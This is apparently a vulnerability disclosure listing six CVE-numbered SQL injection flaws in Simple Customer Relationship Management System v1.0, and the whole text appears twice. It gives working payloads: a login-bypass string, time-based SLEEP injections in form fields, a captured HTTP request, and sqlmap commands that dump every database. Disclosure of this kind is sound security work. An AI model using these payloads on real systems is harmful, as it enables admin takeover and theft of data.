y0gesh-verma/Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability Secret

## Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability
#  Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability

## Multiple SQL Injection Vulnerability found in Simple Customer Relationship Management System 1.0 version.


**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel.

**Step to Reproduce :-**
> 1. Navigate to the Admin Panel By following the URL: http://localhost/php-scrm/admin/
> 2. Now insert the below-given payload in the username field and any random digits/string like "test" in the password field then click on the "Login" button to takeover the admin account.
> Payload: ' or 1 = 1 -- -

**Reference: CVE-2023-24364**


**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the Description parameter under the Create ticket function.

**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Now fill out the Create ticket form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
>    Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 6. Now insert the URL-encoded payload in the description parameter.
>
>    subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send
>
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt
> 11. Now dump databases by sqlmap.
>     # python sqlmap.py -r crm-create-ticket-request.txt -p description -dbs --batch
> 12. Now dump all data by sqlmap.
>     # python sqlmap.py -r crm-create-ticket-request.txt -p description --dump-all --batch

**Reference: CVE-2023-24652**


**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function.

**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the change password page By following the URL: http://localhost/php-scrm/change-password.php
> 4. Now fill out the Change Password form put random digits/string like "test123" in the "Current Password" field and put random content like "123456" in "New Password" and "Confirm Password" fields then intercept the request in burp suite.
> 5. Now send the burp suite intercepted request into burp repeater.
> 6. Now insert the below-given payload in the oldpass parameter then click on the "send" button to send request.
>    Payload: oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change
> 7. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 8. Now dump data by using sqlmap.
> 9. Now copy the burp intercepted request and create a file crm-request.txt
>
> POST /php-scrm/change-password.php HTTP/1.1
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 65
> Origin: http://localhost
> Connection: close
> Referer: http://localhost/php-scrm/change-password.php
> Cookie: PHPSESSID=65c7e25jf215pltjkg8gr5kli9
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
>
> oldpass=test123&newpass=123456&confirmpassword=123456&change=Change
>
> 10. Now dump databases by sqlmap.
>     # python sqlmap.py -r crm-request.txt -p oldpass -dbs --batch
> 11. Now dump all data by sqlmap.
>     # python sqlmap.py -r crm-request.txt -p oldpass --dump-all --batch

**Reference: CVE-2023-24653**


**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.

**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the Request a Quote page By following the URL: http://localhost/php-scrm/get-quote.php
> 4. Now fill out the Quote Request Form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
>    Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(5)))xyz) AND 'abc'='abc
> 6. Now insert the payload in the name parameter.
>
> Content-Disposition: form-data; name="name"
>
> test1' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
>
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-quote-request.txt
> 11. Now dump databases by sqlmap.
>     # python sqlmap.py -r crm-quote-request.txt -p name -dbs --batch
> 12. Now dump all data by sqlmap.
>     # python sqlmap.py -r crm-quote-request.txt -p name --dump-all --batch

**Reference: CVE-2023-24654**


**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function.

**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php
> 4. Now fill out your profile form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
>    Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> 6. Now insert the payload in the name parameter.
>
> Content-Disposition: form-data; name="name"
>
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
>
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-profile-request.txt
>
> 11. Now dump databases by sqlmap.
>     # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch
> 12. Now dump all data by sqlmap.
>     # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch

**Reference: CVE-2023-24655**


**Description:-**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function.

**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Now fill out the Create ticket form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
>    Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 6. Now insert the URL-encoded payload in the subject parameter.
>
> subject=newticket'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&tasktype=Option+1&priority=important&description=newdescriptiontest&send=Send
>
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt
> 11. Now dump databases by sqlmap.
>     # python sqlmap.py -r crm-create-ticket-request.txt -p subject -dbs --batch
> 12. Now dump all data by sqlmap.
>     # python sqlmap.py -r crm-create-ticket-request.txt -p subject --dump-all --batch

**Reference: CVE-2023-24656**
	# Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability

	## Multiple SQL Injection Vulnerability found in Simple Customer Relationship Management System 1.0 version.


	Description:-
	> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel.

	Step to Reproduce :-
	> 1. Navigate to the Admin Panel By following the URL: http://localhost/php-scrm/admin/
	> 2. Now insert the below-given payload in the username field and any random digits/string like "test" in the password field then click on the "Login" button to takeover the admin account.
	> Payload: ' or 1 = 1 -- -

	Reference: CVE-2023-24364



	Description:-
	> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the Description parameter under the Create ticket function.

	Step to Reproduce :-
	> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
	> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
	> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php
	> 4. Now fill out the Create ticket form then intercept the request in the burp suite.
	> 5. Now send the burp suite intercepted request into the burp repeater.
	> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
	> 6. Now insert the URL-encoded payload in the description parameter.
	>
	> subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send
	>
	> 7. Now click on the "send" button to send the request.
	> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
	> 9. Now dump data by using sqlmap.
	> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt
	> 11. Now dump databases by sqlmap.
	> # python sqlmap.py -r crm-create-ticket-request.txt -p description -dbs --batch
	> 12. Now dump all data by sqlmap.
	> # python sqlmap.py -r crm-create-ticket-request.txt -p description --dump-all --batch

	Reference: CVE-2023-24652


	Description:-
	> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function.

	Step to Reproduce :-
	> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
	> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
	> 3. Now Navigate to the change password page By following the URL: http://localhost/php-scrm/change-password.php
	> 4. Now fill out the Change Password form put random digits/string like "test123" in the "Current Password" field and put random content like "123456" in "New Password" and "Confirm Password" fields then intercept the request in burp suite.
	> 5. Now send the burp suite intercepted request into burp repeater.
	> 6. Now insert the below-given payload in the oldpass parameter then click on the "send" button to send request.
	> Payload: oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change
	> 7. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
	> 8. Now dump data by using sqlmap.
	> 9. Now copy the burp intercepted request and create a file crm-request.txt
	>
	> POST /php-scrm/change-password.php HTTP/1.1
	> Host: localhost
	> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
	> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
	> Accept-Language: en-US,en;q=0.5
	> Accept-Encoding: gzip, deflate
	> Content-Type: application/x-www-form-urlencoded
	> Content-Length: 65
	> Origin: http://localhost
	> Connection: close
	> Referer: http://localhost/php-scrm/change-password.php
	> Cookie: PHPSESSID=65c7e25jf215pltjkg8gr5kli9
	> Upgrade-Insecure-Requests: 1
	> Sec-Fetch-Dest: document
	> Sec-Fetch-Mode: navigate
	> Sec-Fetch-Site: same-origin
	> Sec-Fetch-User: ?1
	>
	> oldpass=test123&newpass=123456&confirmpassword=123456&change=Change
	>
	> 10. Now dump databases by sqlmap.
	> # python sqlmap.py -r crm-request.txt -p oldpass -dbs --batch
	> 11. Now dump all data by sqlmap.
	> # python sqlmap.py -r crm-request.txt -p oldpass --dump-all --batch

	Reference: CVE-2023-24653


	Description:-
	> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.

	Step to Reproduce :-
	> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
	> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
	> 3. Now Navigate to the Request a Quote page By following the URL: http://localhost/php-scrm/get-quote.php
	> 4. Now fill out the Quote Request Form then intercept the request in the burp suite.
	> 5. Now send the burp suite intercepted request into the burp repeater.
	> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(5)))xyz) AND 'abc'='abc
	> 6. Now insert the payload in the name parameter.
	>
	> Content-Disposition: form-data; name="name"
	>
	> test1' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
	>
	> 7. Now click on the "send" button to send the request.
	> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
	> 9. Now dump data by using sqlmap.
	> 10. Now copy the burp intercepted request and create a file crm-quote-request.txt
	> 11. Now dump databases by sqlmap.
	> # python sqlmap.py -r crm-quote-request.txt -p name -dbs --batch
	> 12. Now dump all data by sqlmap.
	> # python sqlmap.py -r crm-quote-request.txt -p name --dump-all --batch

	Reference: CVE-2023-24654


	Description:-
	> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function.

	Step to Reproduce :-
	> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
	> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
	> 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php
	> 4. Now fill out your profile form then intercept the request in the burp suite.
	> 5. Now send the burp suite intercepted request into the burp repeater.
	> Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
	> 6. Now insert the payload in the name parameter.
	>
	> Content-Disposition: form-data; name="name"
	>
	> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
	>
	> 7. Now click on the "send" button to send the request.
	> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
	> 9. Now dump data by using sqlmap.
	> 10. Now copy the burp intercepted request and create a file crm-profile-request.txt
	>
	> 11. Now dump databases by sqlmap.
	> # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch
	> 12. Now dump all data by sqlmap.
	> # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch

	Reference: CVE-2023-24655


	Description:-
	> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function.

	Step to Reproduce :-
	> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
	> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
	> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php
	> 4. Now fill out the Create ticket form then intercept the request in the burp suite.
	> 5. Now send the burp suite intercepted request into the burp repeater.
	> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
	> 6. Now insert the URL-encoded payload in the subject parameter.
	>
	> subject=newticket'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&tasktype=Option+1&priority=important&description=newdescriptiontest&send=Send
	>
	> 7. Now click on the "send" button to send the request.
	> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
	> 9. Now dump data by using sqlmap.
	> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt
	> 11. Now dump databases by sqlmap.
	> # python sqlmap.py -r crm-create-ticket-request.txt -p subject -dbs --batch
	> 12. Now dump all data by sqlmap.
	> # python sqlmap.py -r crm-create-ticket-request.txt -p subject --dump-all --batch

	Reference: CVE-2023-24656